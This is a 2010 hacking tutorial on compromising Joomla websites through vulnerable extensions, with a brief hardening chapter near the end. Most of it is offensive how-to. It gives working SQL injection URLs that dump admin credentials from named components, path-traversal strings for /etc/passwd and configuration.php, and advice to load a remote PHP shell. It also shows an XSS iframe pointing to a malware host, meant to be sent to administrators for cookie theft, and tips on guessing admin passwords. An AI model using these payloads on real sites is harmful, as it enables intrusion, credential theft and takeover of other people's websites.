The Joomla Hacking Compendium
                                 ((or: Hacking Joomla for Phun and Profit))
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[+] Title:      The Joomla Hacking Compendium
[+] Author:     Valentin Hoebel
[+] Contact:    valentin@xenuser.org

[+] Version: 1.0
[+] Date: December 2010
[+] Almost 1000 lines of pure knowledge!
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::: - Chapters - :::::::::::::::::::::::::::::::
0x01 - Purpose of this document
0x02 - Introduction
0x03 - The Basics of Joomla
0x04 - The Joomla core
0x05 - Joomla extensions
0x06 - Hacking Joomla
0x07 - SEO, our strongest enemy
0x08 - Examples for Joomla SQL injections
0x09 - Examples for Joomla local file inclusions
0x10 - Examples for Joomla remote file inclusions
0x11 - Examples for Joomla XSSs/CSRFs
0x12 - How to protect your Joomla
0x13 - Conclusion and a look at Joomla's feature
0x14 - How to stay informed (or: the latest vulnerabilities)
0x15 - Useful tools
0x16 - Greetings and THX
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

::
:: 0x01 - Purpose of this document
::

This document should provide you with security related information about
Joomla and the extensions which are available for it. This paper focuses
on how to hack Joomla installations and how to protect them. I do not
want to motivate you to go out there and hack Joomla websites after you
have read this document, this paper is more a theoretical view of how
attackers could compromise the security of a website. It should help
you to understand basic security mechanics, which finally leads you
to a point where you are able to protect Joomla websites.

I also wrote this document in order to summ up some knowledge I gained
about Joomla. I hope it will be helpful in some way and you learn
something new. If you find any typos: feel free to drop me a mail
or simply ignore them. Fuck office / word / word processor -
vim rules!

(( This paper was written for educational purposes. Always know and
respect your local laws. ))


(( While writing this document I assumed, that the reader already
gained some knowledge about web security and Joomla. ))



::
:: 0x02 - Introduction
::

When I was looking for a new CMS for my latest project in January 2007,
I immediately fell in love with Joomla. It was small, it was easy, it
was new, it was amazing, it felt so fresh and yes, I wanted to sleep
with it! Finally someone invented a content management system which
was easy to use and supported categories in categories, basic
magazine features, easy content handling, awesome extensions management
and was fast to install.

While I have been creating countless websites with Joomla, I never
gave security a thought at the beginning. For me it was just about
installing Joomla, applying some cool theme and uploading douzends
of extensions.

But during the years I started to realize that there are kids and
automated scripts out there which looked for vulnerable websites and
"hacked" them automatically. Without any human interaction it was poss-
ible for them to compromise a Joomla installation and make clueless
webmasters angry.

I saw so many defaced sites, being a victim for scripts and not for
skilled hackers.

When I started to do some vulnerability and security research at
March 2010 (the time when I published security related
documents for the first time), I began to focus on Joomla and the
extensions which are available for it. I had no partiuclar reasons
for it, it just happened because so many Joomla websites turned out
to be unsecure.

But I also understood that Joomla itself, the core (sounds very
sci-fi like, doesn't it), seems to be secure in most ways.
I focused on Joomla extensions and discovered many vulnerabilities,
therefore in this document we will mostly have a look at stuff which
is not part of the Joomla core.

Now grab a coffee, switch on the music (I prefer vocal trance, Tiesto
is simply awesome btw!) and be invited to dive into the deepest code lines
and dissections of Joomla.



::
:: 0x03 - The Basics of Joomla
::

Joomla is a content management system and therefore a feature-rich
application. It is full of functions and possibilities to enhance
its functionalities, therefore there may be many attack vectors
in theory.

When you download Joomla, all you need is a webserver, PHP and MySQL
in order to run it. The download file comes with the core and at least
one example theme.

The Joomla core can be enhanced with the help of..
- modules,
- components
- and plugins (also known as mambots).

In most cases the components are vulnerable to attacks.
The modules often only are used to display information in small
boxes on the websites and contain no features which can be used
for exploiting weak spots.

The plugins (mambots) are more likely integrated core parts, e.g.
they can be used to embed PHP code into normal Joomla articles.

The components are the most important extensions for this CMS,
they provide classical functionality, like guestbooks, message
boards, galleries, user management..

The Joomla core itself is almost never vulnerable for attacks.
When you browse the web, you will have a hard time finding
serious attack vendors. Only some XSS and SQL injection
vulnerabilities are known and they are already fixed.

So let's focus on the Joomla components.



::
:: 0x04 - The Joomla core
::

Before inspecting the Joomla component attack vendors we first have a
look at the core.

Download Joomla somewhere and extract all files. Open the file
libraries/phpinputfilter/inputfilter.php
and look at the code:
----------------------------------------
  var $tagsArray; // default = empty array
        var $attrArray; // default = empty array

        var $tagsMethod; // default = 0
        var $attrMethod; // default = 0

        var $xssAuto; // default = 1
        var $tagBlacklist = array ('applet', 'body', 'bgsound' [...]
        var $attrBlacklist = array ('action', 'background'     [...]
----------------------------------------

As you can see, some filter methods of Joomla are based on blacklisting.
This knowledge can be used later to exploit potential vulnerabilities in
a better way. I find this method not very effective, btw.

While HTML tags containing "body" or "bgsound" will be filtered out
at input fields or URL parameters, they can be written in many ways,
e.g. like "bOdY" or "b o DY" etc. You are only limited by your
creativity and will find ways for tricking the blacklist of the
Joomla framework.

Another interesting part is this one (same file):
----------------------------------------
/*
 * Is there a tag? If so it will certainly start with a '<'
 */
$tagOpen_start  = strpos($source, '<');
while ($tagOpen_start !== false)
	{
        /*
         * Get some information about the tag we are processing
         */
         $preTag            .= substr($postTag, 0, $tagOpen_start);
         $postTag                = substr($postTag, $tagOpen_start);
----------------------------------------

As you can see they assume that an HTML tag being used in XSS attacks
starts with a "<". In fact, I never use this character and many
XSS cheatsheets suggest this, too. With this information in mind,
you can most likely avoid being detected by the filters. You can start
your XSS string with "><tag... for example.

If you want to you can continue looking. You will find other filter
methods and, at the end of the file, there are also built in
mechanics which should help to prevent SQL injection vulnerabilities:

----------------------------------------
$string = mysql_real_escape_string($string);
----------------------------------------

By the way, you might know that mysql_real_escape_string is not
sufficient for preventing SQL injection attacks. Just to let you know.


I highly recommend that you get yourself familiar with the Joomla framework
and the way Joomla works. A good start would be to find out where Joomla
sets some metatags. While looking for the responsible script, you will
look over many parts of the Joomla core and therefore gain a basic
understanding of what's going on in the backstage area.

And always remember: the more you learn about Joomla, the easier it is
to exploit vulnerabilities later.

Something which takes not long for being understood is how to reach
the backend of Joomla: simply type in
..website/administrator
in your browser and you will find the admin panel there. In most cases
there is a user called "administrator" or "admin". Try to brute force or
guess the password of that user. You will wonder how many times it is
12345 or sex or simply the website's name.



::
:: 0x05 - Joomla extensions
::

Browse extensions.joomla.org and install some components. They are marked
with a green [C] sign and can be installed by visiting the Joomla backend
(http://www.your-site.com/joomla/administrator).

After having installed some of them, go to the menu management and include
some links to the components on the website. Now visit the website and
browse through the links. You will notice that the URL looks like this:
http://www.website.com/joomla/index.php?option=com_blabla&Item=2&ItemId=5

It so much looks like it contains many attack vendors and is certainly
screeming for many penetration testing sessions. Please, come and hack me!

Of course it is not that easy, but look at this URL. It contains the
following pattern:
index.php?option=	(which calls the component you are visiting)
com_blabla		(the name of the component)
&Item=2			(some ID, not very interesting)
&ItemId=5		(some ID, also not very interesting)

You realize that there is a pattern, don't you? This helps alot while
trying to hack a Joomla website.

It is often possible to add well-known variables (parameters) to the URL,
in most cases Joomla (respectively the component you are visiting) will
parse them. Some of these parameters are:
- controller
- layout
- category
- cat
- visit
- page

And you know: the more parameters there are, the more attack vendors might
exist.



::
:: 0x06 - Hacking Joomla
::

"Enough of this shit, stop talking! How do I hack it???" - Yah, yah.

Having in mind everything we learned, it is almost impossible to hack
a Joomla website core which was installed with the latest version.

Therefore we focus on the extensions (here: components; but modules are
often vulnerable to XSS attacks). Open your local Joomla test installation
(of course you don't try this on life websites, don't you?) and click
through the menu. Notice what components are installed.

There are the following attack vendors:
- look for input fields,
- look at the URL parameters,
- have a look at the source code,
- view the robots.txt,
- try to login via the admin back panel,
- have a look at the used theme (design)
- and try to find a PHPMyAdmin installation.

Concerning the attack vendors for components only, you can use
SQL injection and XSS attacks for input fields and the URL parameters.

If you don't know how to do that, I suggest you Google it up. Try googling
for "SQL injection sheet" or "XSS cheat sheet".

There are many ways for hacking Joomla and some examples will be shown in
the next chapters.



::
:: 0x07 - SEO, our strongest enemy
::

For attacking Joomla effectively, you will try to manipulate the URLs in
most cases. This can only be done when they are shown like this:
http://www.website.com/index.phpoption=com_blabla&Item=2&ItemId=5

When the URLs are like this
http://www.website.com/index,51,blabla
or
http://www.website.com/guestbook/page2
you most likely encounter SEO functionallity.

SEO contains a number of methods which make websites search engine
friendly. A lot of money can be earned in this area.

SEF (search engine friendly) URLs are our strongest enemy. They
hide the original URL from us.

And when there are no parameters in the URLs, we are unable to
find parameters which take our input. But what if we are able to
reconstruct the original URL?

All we need is
a) to know what component is currently active,
b) what parameters it takes and
c) what their current values are.

The process of reconstructing contains of obtaining information and
some decent guessing.

Have a look at the source code of the current page and look for
"com_". You most likely will find a part which looks like this:
----------------------------------------
<input type="hidden" name="option" value="com_blabla" />
<input type="hidden" name="ItemId" value="5" />
<input type="hidden" name="Item" value="2" />
<input type="hidden" name="Entry" value="451" />
<input type="hidden" name="view" value="entries">
----------------------------------------

Bingo! We have everything we need. The original URL is composed by the
parameters being shown in the code above. Attention: only code snippets
which do not contain Joomla default components are interesting for us.
Joomla default components could be com_content or com_search. Especially
com_search is included in almost every Joomla source code and therefore
is not very interesting for us - but the related code snippets can be
misleading.

Now compose your original URL, simply fill out the well-known URL
pattern:
http://www.website.com/
index.php?option=com_blabla&ItemId=5&Item=2&Entry=451&view=entries

You understand this part? Good.
We now have a URL we can work with.

Let's continue with some practical stuff.



::
:: 0x08 - Examples for Joomla SQL injections
::

The probably most common case for hacked Joomla websites is that
a SQL injection vulnerability was exploited. A typical URL which
is affected by this type of vulnerability looks like this:
index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

You can find out if a parameter is vulnerable when you change
its value from e.g. category=5 to category='.
Press enter and look for MySQL errors in the website. If you find
one, you might have discovered a SQL inkjection vulnerability.

In order to give you a better understanding and feeling of
how vulnerable URLs might look like, I just show you some
URLs which are known to be vulnerable (I discovered them):

URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on regular
basis :)

Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:

Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--

Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--


Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of raindbow tables.

SQL injections in Joomla give us so much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the databases which do not belong
to Joomla but still contain some very interesting information.



::
:: 0x09 - Examples for Joomla local file inclusions
::

Local file inclusions are very funny. You tell the website what you
want to see. Awesome! You want to view the configuration file
which contains the database login credentials? No problem.
You want to view the /etc/passwd file if Joomla is hosted
on a Linux box? You can do that.

Local file inclusions are also a common problem in Joomla extensions.
Many of them are vulnerable for this type of attack and some of them
never get fixed. This may lead to a server hack, which is not
funny any more - at least for the system administrator.

A typical URL being vulnerable to LFI looks like this:
index.php?option=com_blablubb&Item=2&view=guestbookpage

Typically most of the vulnerable parameters are this one:
- controller
- view
- layout
- page

To give you some proper understanding of typical affected
URLs I provide you with some examples I found earlier this year:

URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
((I didn't find this one.))

Now let's see how we can use this:
index.php?option=com_jradio&controller=../../../../etc/passwd%00

In this case we need to use the famous Nullbyte which helps us
to bypass a restriction which is set in the responsible PHP script
of the component.

In the example above the controller parameter is used to
include a file from the local hard disk. This file contains
useful information for us.

If you are not familiar with local file inclusions I recommend
you look a tutorial up since I will not explain any details here.

Now with the knowledge about a LFI vulnerability within a Joomla
component, we can try to access the configuration.php of Joomla.
This file contains very very interesting information.

Since many LFIs also reveal PHP source code, we try this one:
index.php?option=com_blabla&view=../../../configuration.php

The source code of the file is shown and we receive the login
data for the current database user. Now find a PHPMyAdmin
login on the same server and try to login with this data.

You now have access to all Joomla tables and can basically
do what you want.



::
:: 0x10 - Examples for Joomla remote file inclusions
::

Some Joomla components are also known for containing
remote file inclusion vulnerabilities. RFIs allow us to
include files from another server and to execure code on
the target.

A typical RFI URL looks like a LFI URL. In order to
give you a better feeling of how to see a RFI vulner-
ability within seconds, I show you some examples
(I did not find this ones):

URL: index.php?option=com_sef&Itemid=&mosConfig.absolute.path=.
Vulnerable Parameter: &mosConfig.absolute.path

URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task

When you found a RFI vulnerability, try to include your PHP
shell which is hosted on another box.
Once you uploaded it, you are able to browse all Joomla files
and download them, change them, remove them...

No Joomla installation is safe when there is an exploited
RFI.



::
:: 0x11 - Examples for Joomla XSSs/CSRFs
::

XSS/CSRF vulnerabilities can mostly be found in input fields,
such as forms, guestbooks, shoutboxes and search boxes. They
allow to execute HTML/JS/VBS code within the context of the
visitor's browser.

A typical example would be to use this HTML code in order
to see if an input field or a parameter is vulnerable:
"><iframe src=http://www.google.com>

(( Try to avoid quotes in the XSS string. They are escaped
in most cases because XSS filters do their work. ))

Notice how the XSS string starts with "> and not with a
HTML tag itself. This is done in order to close the current
tag you are in.

Let's say you are trying this code on an input field.
The code for this field probably looks like this:
----------------------------------------
<input type="text" name="search" value="" />
----------------------------------------

When a web browser parses the source code of a website and
displays an input field, you of course do not see the source
code. But because you are able to do things with the input
field and are able to select it with your cursor, the browser
tells you that you are inside this <input..> tag now.
So while you are typing within an input box, you are
located somewhere here;
<input type="text" name="search" value="" />
					^
So let's say you are within the quotes of the value attribute
while you type something. This means that the source code looks
like this at this point: value="SOMETHINGYOUTYPEDIN
As you can see, the quotes are not closed. So now close the
quotes and the HTML tag with your XSS string in order to
have clean and working HTML code as a result:
"><iframe src=http://www.google.de>

When you press enter and the browser parses the code, it most
likely looks like this:
----------------------------------------
<input type="text" name="search" value=""><iframe src=http://...
----------------------------------------

You get the point?
Another reason why it is a good idea to start a XSS string with
"> and not with < is the fact that many XSS filters throw out
or espace the < when it is used in an input field.

Of course there are also components which allow including
HTML/JS/VBS code into a parameter. Here are some examples
I found:

URL: index.php?option=com_reservations&task=askope&nidser=2\
&namser=test
Vulnerable Parameter: namser

URL: index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0\
&data_search=test
Vulnerable Parameter: data_search

So a good example for an URL containing a XSS string could
be:
----------------------------------------
index.php?option=com_reservations&task=askope&nidser=2\
&namser="><iframe src=http://www.your-website-with-some\
malware-included.com/script.php>
----------------------------------------

Now simply send this link to the administrator of the
affected Joomla website and he will have your malicious
website included within his browser. You are now able
to read out cookies, maybe create a phishing login site
which fakes the Joomla backend login etc.

Many people being interesting in IT security think that
XSS/CSRF attacks are not critical, but in my eyes you
can cause a lot of damage by injecting code into the
context of another visitor's browser.

I discovered a XSS vulnerability within Facebook a few
months ago, just let your phantasy imagine what you
could do with this knowledge when you have a criminal
mind.

Performing such attacks are a normal part of web security
and can be very dangerous, that is why they are so
pupular.



::
:: 0x12 - How to protect your Joomla
::

So far whe have covered most of the hacking parts about
Joomla. Having some knowledge about web security and
having read this paper, you now should be able to
hack Joomla websites within minutes. Of course
you shouldn't do this, and I hope you only use this
knowledge in order to protect your own or other Joomla
websites ;)

Speaking of protecting Joomla... how can we prevent
kiddies and skilled "hackers" from breaking into
your Joomla installation?

At first make sure you follow these simple, but
important rules:

a)
Always keep Joomla up2date

b)
Always make sure you run the latest patched
versions of the extensions you used

c)
Make sure you choose strong passwords for all
logins

d)
Check your own website for vulnerabilities, you
now know how to do this

e)
Always check the webserver's log files for
potential hack attempts

f)
Secure your server if you host your Joomla
website on a VPS or even a dedicated server

g)
Create a list of all extensions you use and
try to monitor them. For example you can use
Google or security websites for staying
informed about the latest vulnerabilities.
Only use secure extensions.

Furthermore you can apply our secret weapon which
holds off like 90 percent of all script kiddie
and automated script attacks:
SEO!

Activate the SEO features, use SEF URLs and have
fun watching your webserver logfile
(use tail -f /var/log/apache2/access_log for this)
while automated mechanisms try to hack your website,
but fail because you hide your real URLs from them :)

Furthermore most tools and scanners are not able to
work with search engine friendly URLs (I have the same
problem with my self-written tools, too :\).

This might be a big surprise, but with these
measures you already gained a decent protection
level.

The last things to do would be to rename the Joomla
backend folder from "administrator" to may be
"admin_acp_1234567" in order to prevent kiddies
and scanners from finding your Joomla backend.

And, last but not least, protect the PHPMyAdmin
login (if you have any) with .htaccess files :)

(( You can't do this with the Joomla admin control
panel since some components need to have access to
administrator/components..)



::
:: 0x13 - Conclusion and a look at Joomla's feature
::

We have learned how to hack Joomla website and how
to protect them. We now know how attackers think and
what they try to do. They mainly focus on URL parameters
and input fields. They have a look at the robots.txt,
at the source code and try to find your Joomla backend
or the PHPMyAdmin page.

In fact hacking Joomla is not even difficult. All it
requires is the little knowledge being described
here and some patience.

A good thing is that Joomla itself is mostly secure,
while a sad fact is that so many Joomla components are
vulnerable to attacks which could be prevented
by applying simple filter mechanisms.

The main problem is that there are so many Joomla
extensions authors who don't have a good security
awareness and simply don*t know about potential flaws
(or even worse: they just ignore them).

The Joomla team can't do anything about this,
but what they can do is maybe introduce some sort of
premium extension database. A database which lists
secure components which are tested/checked on regular
basis. With such a system it would be possible to
create a download platform for secure addons -
some sort of premium app store, so to speak :)

Another possibility would be to force extensions
to run their input/output through filters which are
located in the Joomla framework. But as long as the
Joomla built-in methods are not good enough, this is
not a big help.

A third solution would be to only publish extensions
on extensions.joomla.org when their authors have
passed some simple tests. The topics could be web
security, basic coding and secure GET/POST stuff.

Such initiatives could only come from the Joomla
community, and as long they don't run a program like
that, Joomla will remain a very unsecure CMS
(because of the available extensions, not because
of the core).

This is maybe one of the things which prevents
the Joomla CMS from a even bigger breakthrough.

Not a small number of companies still try to avoid
using Joomla since they are concerned about security
issues.



::
:: 0x14 - How to stay informed (or: the latest vulnerabilities)
::

There are many ways to inform yourself about the latest
threads etc. One method would be to google for
"com__blablubb vulnerability", where blablubb is the name
of a component you use. If there are no serious results on
the first two pages, there is a good chance that this ex-
tension might be secure enough.

An even better idea is to open up your browser and visit
exploit-db.com and use the search feature.

An interesting project about unsecure Joomla components
is joomlaexploit.com. It contains a large list of
components which goes back to 2006 (the time when
Joomla emerged from Mambo). It is not complete and you
won't find any details about the vulnerabilities there,
but at least you have a list of potential threads for
your website.

And of course there is the famous
docs.joomla.org/Vulnerable_Extensions_List
, a maybe unreliable source because the information there
is not up2date and everything is based on humans working
on that list. But still I think they do a great job, having
in mind that they work there for free.

You can see that it is easy to stay informed, so
don't be lazy and read this stuff daily.



::
:: 0x15 - Useful tools
::

Manual testing is awesome, but automated checks are faster and
maybe even more reliable. Here are some self-written tools
you could use for your purposes:

#1
Joomla QPersonel Exploit
http://www.xenuser.org/exploits/joomla_com_qpersonel_sploit.py

#2
Automated Joomla SQL Injection Exploiter
http://www.xenuser.org/exploits/joomla_sqli_sploiter.py

#3
Joomla BF Quiz Exploit
http://www.xenuser.org/exploits/joomla_com_bfquiz_sploit.py

#4
Column Fuzzer
http://xenuser.org/tools/column_finder.py

#5
Simple SQL Injection Vulnerability Scanner
http://www.xenuser.org/tools/sqli_scanner.py

#6
Simple Log File Analyzer
http://www.xenuser.org/tools/scan_log.py

#7
Simple Local File Inclusion Exploiter
http://www.xenuser.org/tools/lfi_sploiter.py

These tools can help you to exploit vulnerabilities
within Joomla or some extensions.

Read the help (included in those tools) for details.

The Simple Log File Analyzer could be used for
scanning your Apache log files. It shows if there
are hack attempts.



::
:: 0x16 - Greetings and THX
::

I think it is only fair when you say "thank you" from
time to time to those, who work almost daily for
Open Source software or large communities.

Greetings: JosS, cr4wl3r, Todd, Josh
Most awesome site of the moment: packetstormsecurity.org
Thank you: OSVDB moderators for their free work

A big hello to Wikileaks and all the idiots who try
to stop them. You can't.



ASCII FOR BREAKFAST - http://www.xenuser.org - Valentin Hoebel - 2010-12
:::::::::::::::::::::::::::::::: - EOF - ::::::::::::::::::::::::::::::::::